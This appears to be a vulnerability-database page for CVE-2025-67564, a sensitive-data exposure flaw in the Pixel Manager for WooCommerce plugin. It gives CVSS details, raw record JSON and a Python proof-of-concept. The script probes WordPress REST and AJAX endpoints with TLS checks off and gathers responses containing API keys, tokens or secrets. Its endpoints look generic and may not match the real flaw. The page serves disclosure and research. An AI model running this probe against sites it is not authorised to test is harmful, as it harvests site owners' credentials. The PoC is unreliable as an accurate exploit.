Security Vulnerability Report
中文
CVE-2025-67564 CVSS 5.3 MEDIUM

CVE-2025-67564

Published: 2025-12-09 16:18:33
Last Modified: 2026-04-15 00:35:42

Description

Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in alekv Pixel Manager for WooCommerce woocommerce-google-adwords-conversion-tracking-tag allows Retrieve Embedded Sensitive Data.This issue affects Pixel Manager for WooCommerce: from n/a through <= 1.51.1.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Pixel Manager for WooCommerce <= 1.51.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2025-67564 PoC - Pixel Manager for WooCommerce Sensitive Data Exposure # Target: WordPress site with Pixel Manager for WooCommerce plugin <= 1.51.1 def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2025-67564 """ endpoints = [ "/wp-json/wp/v2/settings", "/?rest_route=/wp/v2/settings", "/wp-json/pmwc/v1/config", "/wp-admin/admin-ajax.php?action=pmwc_get_config" ] vulnerable = False exposed_data = {} for endpoint in endpoints: try: url = target_url.rstrip('/') + endpoint headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Accept': 'application/json' } response = requests.get(url, headers=headers, timeout=10, verify=False) if response.status_code == 200: data = response.json() # Check for sensitive data patterns sensitive_keys = ['google_api_key', 'conversion_id', 'ads_id', 'api_key', 'token', 'secret'] for key in sensitive_keys: if key.lower() in json.dumps(data).lower(): vulnerable = True exposed_data[endpoint] = data break except Exception as e: print(f"Error testing {endpoint}: {e}") return vulnerable, exposed_data # Example usage if __name__ == "__main__": target = "https://example-wordpress-site.com" is_vuln, data = check_vulnerability(target) print(f"Vulnerable: {is_vuln}") if is_vuln: print(f"Exposed Data: {json.dumps(data, indent=2)}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67564", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:32.960", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in alekv Pixel Manager for WooCommerce woocommerce-google-adwords-conversion-tracking-tag allows Retrieve Embedded Sensitive Data.This issue affects Pixel Manager for WooCommerce: from n/a through <= 1.51.1."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/woocommerce-google-adwords-conversion-tracking-tag/vulnerability/wordpress-pixel-manager-for-woocommerce-plugin-1-51-1-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}